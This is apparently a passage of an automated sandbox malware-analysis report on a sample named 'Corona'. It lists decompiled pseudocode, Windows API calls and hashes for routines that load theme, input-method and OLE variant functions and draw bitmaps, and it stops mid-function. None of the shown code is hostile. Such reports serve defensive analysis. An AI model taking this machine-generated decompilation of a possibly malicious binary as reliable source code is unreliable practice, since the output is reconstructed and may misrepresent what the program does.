                                  				if(_t31 >= 0) {
                                  					if( *((short*)( &_v48 + 0x20)) == 3) {
                                  						do {
                                  							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                  							 *(_t33 + _t31 * 4) = _t20;
                                  							_t31 = _t31 - 1;
                                  						} while (_t31 >= 0);
                                  						return _t20;
                                  					} else {
                                  						goto L2;
                                  					}
                                  					do {
                                  						L2:
                                  						asm("bswap eax");
                                  						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                  						 *(_t33 + _t31 * 4) = _t22;
                                  						_t31 = _t31 - 1;
                                  					} while (_t31 >= 0);
                                  					return _t22;
                                  				}
                                  				return _t17;
                                  			}












                                  APIs
                                  • GetSystemInfo.KERNEL32(?), ref: 0041DBBC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: e8bcbb645ebc18f10774770217675841b7b668b79ed4c6f0fe3de0b884096808
                                  • Instruction ID: 163d5351bffbad75f50d43b398ea6638e4d7d1def341d60d56ddceec8c4e341b
                                  • Opcode Fuzzy Hash: e8bcbb645ebc18f10774770217675841b7b668b79ed4c6f0fe3de0b884096808
                                  • Instruction Fuzzy Hash: 12F0C2B1E0810D9BCB04DF98C484CDDB7B4FA5630171142AAC405DB342EB38BA81CB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00425634(void* __ebx, void* __ecx) {
                                  				char _v5;
                                  				intOrPtr _t2;
                                  				intOrPtr _t6;
                                  				intOrPtr _t108;
                                  				intOrPtr _t111;
                                  
                                  				_t2 =  *0x452a40; // 0x2130dc8
                                  				E0042542C(_t2);
                                  				_push(_t111);
                                  				_push(0x4259e7);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t111;
                                  				 *0x452a3c =  *0x452a3c + 1;
                                  				if( *0x452a38 == 0) {
                                  					 *0x452a38 = LoadLibraryA("uxtheme.dll");
                                  					if( *0x452a38 > 0) {
                                  						 *0x452978 = GetProcAddress( *0x452a38, "OpenThemeData");
                                  						 *0x45297c = GetProcAddress( *0x452a38, "CloseThemeData");
                                  						 *0x452980 = GetProcAddress( *0x452a38, "DrawThemeBackground");
                                  						 *0x452984 = GetProcAddress( *0x452a38, "DrawThemeText");
                                  						 *0x452988 = GetProcAddress( *0x452a38, "GetThemeBackgroundContentRect");
                                  						 *0x45298c = GetProcAddress( *0x452a38, "GetThemeBackgroundContentRect");
                                  						 *0x452990 = GetProcAddress( *0x452a38, "GetThemePartSize");
                                  						 *0x452994 = GetProcAddress( *0x452a38, "GetThemeTextExtent");
                                  						 *0x452998 = GetProcAddress( *0x452a38, "GetThemeTextMetrics");
                                  						 *0x45299c = GetProcAddress( *0x452a38, "GetThemeBackgroundRegion");
                                  						 *0x4529a0 = GetProcAddress( *0x452a38, "HitTestThemeBackground");
                                  						 *0x4529a4 = GetProcAddress( *0x452a38, "DrawThemeEdge");
                                  						 *0x4529a8 = GetProcAddress( *0x452a38, "DrawThemeIcon");
                                  						 *0x4529ac = GetProcAddress( *0x452a38, "IsThemePartDefined");
                                  						 *0x4529b0 = GetProcAddress( *0x452a38, "IsThemeBackgroundPartiallyTransparent");
                                  						 *0x4529b4 = GetProcAddress( *0x452a38, "GetThemeColor");
                                  						 *0x4529b8 = GetProcAddress( *0x452a38, "GetThemeMetric");
                                  						 *0x4529bc = GetProcAddress( *0x452a38, "GetThemeString");
                                  						 *0x4529c0 = GetProcAddress( *0x452a38, "GetThemeBool");
                                  						 *0x4529c4 = GetProcAddress( *0x452a38, "GetThemeInt");
                                  						 *0x4529c8 = GetProcAddress( *0x452a38, "GetThemeEnumValue");
                                  						 *0x4529cc = GetProcAddress( *0x452a38, "GetThemePosition");
                                  						 *0x4529d0 = GetProcAddress( *0x452a38, "GetThemeFont");
                                  						 *0x4529d4 = GetProcAddress( *0x452a38, "GetThemeRect");
                                  						 *0x4529d8 = GetProcAddress( *0x452a38, "GetThemeMargins");
                                  						 *0x4529dc = GetProcAddress( *0x452a38, "GetThemeIntList");
                                  						 *0x4529e0 = GetProcAddress( *0x452a38, "GetThemePropertyOrigin");
                                  						 *0x4529e4 = GetProcAddress( *0x452a38, "SetWindowTheme");
                                  						 *0x4529e8 = GetProcAddress( *0x452a38, "GetThemeFilename");
                                  						 *0x4529ec = GetProcAddress( *0x452a38, "GetThemeSysColor");
                                  						 *0x4529f0 = GetProcAddress( *0x452a38, "GetThemeSysColorBrush");
                                  						 *0x4529f4 = GetProcAddress( *0x452a38, "GetThemeSysBool");
                                  						 *0x4529f8 = GetProcAddress( *0x452a38, "GetThemeSysSize");
                                  						 *0x4529fc = GetProcAddress( *0x452a38, "GetThemeSysFont");
                                  						 *0x452a00 = GetProcAddress( *0x452a38, "GetThemeSysString");
                                  						 *0x452a04 = GetProcAddress( *0x452a38, "GetThemeSysInt");
                                  						 *0x452a08 = GetProcAddress( *0x452a38, "IsThemeActive");
                                  						 *0x452a0c = GetProcAddress( *0x452a38, "IsAppThemed");
                                  						 *0x452a10 = GetProcAddress( *0x452a38, "GetWindowTheme");
                                  						 *0x452a14 = GetProcAddress( *0x452a38, "EnableThemeDialogTexture");
                                  						 *0x452a18 = GetProcAddress( *0x452a38, "IsThemeDialogTextureEnabled");
                                  						 *0x452a1c = GetProcAddress( *0x452a38, "GetThemeAppProperties");
                                  						 *0x452a20 = GetProcAddress( *0x452a38, "SetThemeAppProperties");
                                  						 *0x452a24 = GetProcAddress( *0x452a38, "GetCurrentThemeName");
                                  						 *0x452a28 = GetProcAddress( *0x452a38, "GetThemeDocumentationProperty");
                                  						 *0x452a2c = GetProcAddress( *0x452a38, "DrawThemeParentBackground");
                                  						 *0x452a30 = GetProcAddress( *0x452a38, "EnableTheming");
                                  					}
                                  				}
                                  				_v5 =  *0x452a38 > 0;
                                  				_pop(_t108);
                                  				 *[fs:eax] = _t108;
                                  				_push(0x4259ee);
                                  				_t6 =  *0x452a40; // 0x2130dc8
                                  				return E00425434(_t6);
                                  			}









                                  APIs
                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,004259E7), ref: 0042566A
                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00425682
                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00425694
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 004256A6
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 004256B8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004256CA
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 004256DC
                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 004256EE
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00425700
                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00425712
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00425724
                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00425736
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00425748
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042575A
                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042576C
                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042577E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00425790
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 004257A2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 004257B4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 004257C6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 004257D8
                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 004257EA
                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 004257FC
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042580E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00425820
                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00425832
                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00425844
                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00425856
                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00425868
                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042587A
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042588C
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042589E
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 004258B0
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 004258C2
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 004258D4
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 004258E6
                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 004258F8
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042590A
                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042591C
                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042592E
                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00425940
                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00425952
                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00425964
                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00425976
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00425988
                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042599A
                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004259AC
                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 004259BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                  • API String ID: 2238633743-2910565190
                                  • Opcode ID: f7f4783a9a88d08bd4dddb214be36be475cd07fdfb673d69e6eb84982f0c0870
                                  • Instruction ID: b08a24b3ffc27a05fdf412353021a04610787556389c2f22dc50307e4adaf93b
                                  • Opcode Fuzzy Hash: f7f4783a9a88d08bd4dddb214be36be475cd07fdfb673d69e6eb84982f0c0870
                                  • Instruction Fuzzy Hash: 4DA10EB0B45B64AFDF00EB65ED86A2637A8EB167017A00577B400DF296D6B8DD00CF6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00439734() {
                                  				int _v8;
                                  				intOrPtr _t4;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t15;
                                  				struct HINSTANCE__* _t17;
                                  				struct HINSTANCE__* _t19;
                                  				struct HINSTANCE__* _t21;
                                  				struct HINSTANCE__* _t23;
                                  				struct HINSTANCE__* _t25;
                                  				struct HINSTANCE__* _t27;
                                  				struct HINSTANCE__* _t29;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  
                                  				_t42 = _t44;
                                  				_t4 =  *0x45112c; // 0x452740
                                  				if( *((char*)(_t4 + 0xc)) == 0) {
                                  					return _t4;
                                  				} else {
                                  					_v8 = SetErrorMode(0x8000);
                                  					_push(_t42);
                                  					_push(0x43989a);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t44;
                                  					if( *0x452b64 == 0) {
                                  						 *0x452b64 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                  					}
                                  					if( *0x450b00 == 0) {
                                  						 *0x450b00 = LoadLibraryA("imm32.dll");
                                  						if( *0x450b00 != 0) {
                                  							_t11 =  *0x450b00; // 0x0
                                  							 *0x452b68 = GetProcAddress(_t11, "ImmGetContext");
                                  							_t13 =  *0x450b00; // 0x0
                                  							 *0x452b6c = GetProcAddress(_t13, "ImmReleaseContext");
                                  							_t15 =  *0x450b00; // 0x0
                                  							 *0x452b70 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                  							_t17 =  *0x450b00; // 0x0
                                  							 *0x452b74 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                  							_t19 =  *0x450b00; // 0x0
                                  							 *0x452b78 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                  							_t21 =  *0x450b00; // 0x0
                                  							 *0x452b7c = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                  							_t23 =  *0x450b00; // 0x0
                                  							 *0x452b80 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                  							_t25 =  *0x450b00; // 0x0
                                  							 *0x452b84 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                  							_t27 =  *0x450b00; // 0x0
                                  							 *0x452b88 = GetProcAddress(_t27, "ImmIsIME");
                                  							_t29 =  *0x450b00; // 0x0
                                  							 *0x452b8c = GetProcAddress(_t29, "ImmNotifyIME");
                                  						}
                                  					}
                                  					_pop(_t40);
                                  					 *[fs:eax] = _t40;
                                  					_push(0x4398a1);
                                  					return SetErrorMode(_v8);
                                  				}
                                  			}



















                                  APIs
                                  • SetErrorMode.KERNEL32(00008000), ref: 0043974D
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,0043989A,?,00008000), ref: 00439771
                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0043977E
                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,0043989A,?,00008000), ref: 0043979A
                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004397BC
                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004397D1
                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004397E6
                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004397FB
                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00439810
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00439825
                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0043983A
                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0043984F
                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00439864
                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00439879
                                  • SetErrorMode.KERNEL32(?,004398A1,00008000), ref: 00439894
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                  • String ID: @'E$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                  • API String ID: 3397921170-1903349282
                                  • Opcode ID: d0908dcf3a2a8b3b2bb8657387a1d8d95a7187f466a1275df40fec1c1dabca2f
                                  • Instruction ID: 336c5207b433e9d0613543334c10ac230abcfd525e1b43fdda901f9345ddfeb5
                                  • Opcode Fuzzy Hash: d0908dcf3a2a8b3b2bb8657387a1d8d95a7187f466a1275df40fec1c1dabca2f
                                  • Instruction Fuzzy Hash: 97313FB9914744AEDB04EFA1ED96A2637A8E749705F24143BB0409B292D6FCED00CF1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D5F4() {
                                  				struct HINSTANCE__* _v8;
                                  				intOrPtr _t46;
                                  				void* _t91;
                                  
                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                  				 *0x4527a0 = E0040D5C8("VariantChangeTypeEx", E0040D164, _t91);
                                  				 *0x4527a4 = E0040D5C8("VarNeg", E0040D194, _t91);
                                  				 *0x4527a8 = E0040D5C8("VarNot", E0040D194, _t91);
                                  				 *0x4527ac = E0040D5C8("VarAdd", E0040D1A0, _t91);
                                  				 *0x4527b0 = E0040D5C8("VarSub", E0040D1A0, _t91);
                                  				 *0x4527b4 = E0040D5C8("VarMul", E0040D1A0, _t91);
                                  				 *0x4527b8 = E0040D5C8("VarDiv", E0040D1A0, _t91);
                                  				 *0x4527bc = E0040D5C8("VarIdiv", E0040D1A0, _t91);
                                  				 *0x4527c0 = E0040D5C8("VarMod", E0040D1A0, _t91);
                                  				 *0x4527c4 = E0040D5C8("VarAnd", E0040D1A0, _t91);
                                  				 *0x4527c8 = E0040D5C8("VarOr", E0040D1A0, _t91);
                                  				 *0x4527cc = E0040D5C8("VarXor", E0040D1A0, _t91);
                                  				 *0x4527d0 = E0040D5C8("VarCmp", E0040D1AC, _t91);
                                  				 *0x4527d4 = E0040D5C8("VarI4FromStr", E0040D1B8, _t91);
                                  				 *0x4527d8 = E0040D5C8("VarR4FromStr", E0040D224, _t91);
                                  				 *0x4527dc = E0040D5C8("VarR8FromStr", E0040D290, _t91);
                                  				 *0x4527e0 = E0040D5C8("VarDateFromStr", E0040D2FC, _t91);
                                  				 *0x4527e4 = E0040D5C8("VarCyFromStr", E0040D368, _t91);
                                  				 *0x4527e8 = E0040D5C8("VarBoolFromStr", E0040D3D4, _t91);
                                  				 *0x4527ec = E0040D5C8("VarBstrFromCy", E0040D454, _t91);
                                  				 *0x4527f0 = E0040D5C8("VarBstrFromDate", E0040D4C4, _t91);
                                  				_t46 = E0040D5C8("VarBstrFromBool", E0040D534, _t91);
                                  				 *0x4527f4 = _t46;
                                  				return _t46;
                                  			}







                                  APIs
                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040D5FD
                                    • Part of subcall function 0040D5C8: GetProcAddress.KERNEL32(00000000), ref: 0040D5E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 595c52bc1de888a877c2591ff9daa0970fa00584c0c85f1941bccf92f21e24e7
                                  • Instruction ID: 623002e170f160f2225b64dbb8fcaf23227ea13e97c7967c2e6102d296ea26ef
                                  • Opcode Fuzzy Hash: 595c52bc1de888a877c2591ff9daa0970fa00584c0c85f1941bccf92f21e24e7
                                  • Instruction Fuzzy Hash: 0941D362E543086FD304BBEE7D014267BD8D7897183A0D03FF814AA6DADF7CA949462D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 52%
                                  			E0041D868(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                  				int _v8;
                                  				int _v12;
                                  				char _v13;
                                  				struct HDC__* _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				long _v32;
                                  				long _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr* _t78;
                                  				intOrPtr _t87;
                                  				struct HDC__* _t88;
                                  				intOrPtr _t91;
                                  				struct HDC__* _t92;
                                  				struct HDC__* _t135;
                                  				int _t162;
                                  				intOrPtr _t169;
                                  				intOrPtr _t171;
                                  				struct HDC__* _t173;
                                  				int _t175;
                                  				void* _t177;
                                  				void* _t178;
                                  				intOrPtr _t179;
                                  
                                  				_t177 = _t178;
                                  				_t179 = _t178 + 0xffffffdc;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t173 = __eax;
                                  				_t175 = _a16;
                                  				_t162 = _a20;
                                  				_v13 = 1;
                                  				_t78 =  *0x451120; // 0x4500c4
                                  				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                  					_v40 = 0;
                                  					_push(0);
                                  					L0040603C();
                                  					_v20 = E0041D6C4(0);
                                  					_push(_t177);
                                  					_push(0x41dae8);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t179;
                                  					_push(_t175);
                                  					_push(_t162);
                                  					_push(_a32);
                                  					L00406034();
                                  					_v24 = E0041D6C4(_a32);
                                  					_v28 = SelectObject(_v20, _v24);
                                  					_push(0);
                                  					_t87 =  *0x45288c; // 0xa8080a0b
                                  					_push(_t87);
                                  					_t88 = _a32;
                                  					_push(_t88);
                                  					L0040619C();
                                  					_v40 = _t88;
                                  					_push(0);
                                  					_push(_v40);
                                  					_push(_a32);
                                  					L0040619C();
                                  					if(_v40 == 0) {
                                  						_push(0xffffffff);
                                  						_t91 =  *0x45288c; // 0xa8080a0b
                                  						_push(_t91);
                                  						_t92 = _v20;
                                  						_push(_t92);
                                  						L0040619C();
                                  						_v40 = _t92;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_v40);
                                  						_t135 = _v20;
                                  						_push(_t135);
                                  						L0040619C();
                                  						_v40 = _t135;
                                  					}
                                  					_push(_v20);
                                  					L0040616C();
                                  					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                  					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                  					_v32 = SetTextColor(_t173, 0);
                                  					_v36 = SetBkColor(_t173, 0xffffff);
                                  					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                  					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                  					SetTextColor(_t173, _v32);
                                  					SetBkColor(_t173, _v36);
                                  					if(_v28 != 0) {
                                  						SelectObject(_v20, _v28);
                                  					}
                                  					DeleteObject(_v24);
                                  					_pop(_t169);
                                  					 *[fs:eax] = _t169;
                                  					_push(E0041DAEF);
                                  					if(_v40 != 0) {
                                  						_push(0);
                                  						_push(_v40);
                                  						_push(_v20);
                                  						L0040619C();
                                  					}
                                  					return DeleteDC(_v20);
                                  				} else {
                                  					_push(1);
                                  					_push(1);
                                  					_push(_a32);
                                  					L00406034();
                                  					_v24 = E0041D6C4(_a32);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					_push(_t177);
                                  					_push(0x41d93b);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t179;
                                  					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406754(0xaa0029, 0xcc0020));
                                  					_pop(_t171);
                                  					 *[fs:eax] = _t171;
                                  					_push(E0041DAEF);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					return DeleteObject(_v24);
                                  				}
                                  			}

                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001), ref: 0041D8AB
                                  • SelectObject.GDI32(?,?), ref: 0041D8C0
                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041D93B,?,?), ref: 0041D90F
                                  • SelectObject.GDI32(?,?), ref: 0041D929
                                  • DeleteObject.GDI32(?), ref: 0041D935
                                  • 72E7A590.GDI32(00000000), ref: 0041D949
                                  • 72E7A520.GDI32(?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D96A
                                  • SelectObject.GDI32(?,?), ref: 0041D97F
                                  • 72E7B410.GDI32(?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D993
                                  • 72E7B410.GDI32(?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D9A5
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8), ref: 0041D9BA
                                  • 72E7B410.GDI32(?,A8080A0B,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8), ref: 0041D9D0
                                  • 72E7B150.GDI32(?,?,A8080A0B,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000), ref: 0041D9DC
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041D9FE
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041DA20
                                  • SetTextColor.GDI32(?,00000000), ref: 0041DA28
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041DA36
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041DA62
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041DA87
                                  • SetTextColor.GDI32(?,?), ref: 0041DA91
                                  • SetBkColor.GDI32(?,?), ref: 0041DA9B
                                  • SelectObject.GDI32(?,00000000), ref: 0041DAAE
                                  • DeleteObject.GDI32(?), ref: 0041DAB7
                                  • 72E7B410.GDI32(?,00000000,00000000,0041DAEF,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041DAD9
                                  • DeleteDC.GDI32(?), ref: 0041DAE2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID:
                                  • API String ID: 3348367721-0
                                  • Opcode ID: adb07ece7ecb609679bd4935c2d80a1b63db15c13550395349cd91ba3d62ffa9
                                  • Instruction ID: fe795ed8509bb66459287f9b660ace3d829babc49c552c1c6e31242553650d1f
                                  • Opcode Fuzzy Hash: adb07ece7ecb609679bd4935c2d80a1b63db15c13550395349cd91ba3d62ffa9
                                  • Instruction Fuzzy Hash: 6781B2B1A00209AFDB50EFA9CD81FAF77ECAB0D314F11045AF618E7281C679AD508B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00420E88(void* __eax, long __ecx, intOrPtr __edx) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _v20;
                                  				char _v21;
                                  				void* _v28;
                                  				void* _v32;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				int _v108;
                                  				int _v112;
                                  				void _v116;
                                  				void* _t64;
                                  				int _t65;
                                  				intOrPtr _t66;
                                  				long _t77;
                                  				void* _t107;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  				long _t120;
                                  				intOrPtr _t123;
                                  				void* _t127;
                                  				void* _t129;
                                  				intOrPtr _t130;
                                  
                                  				_t127 = _t129;
                                  				_t130 = _t129 + 0xffffff90;
                                  				_t120 = __ecx;
                                  				_t123 = __edx;
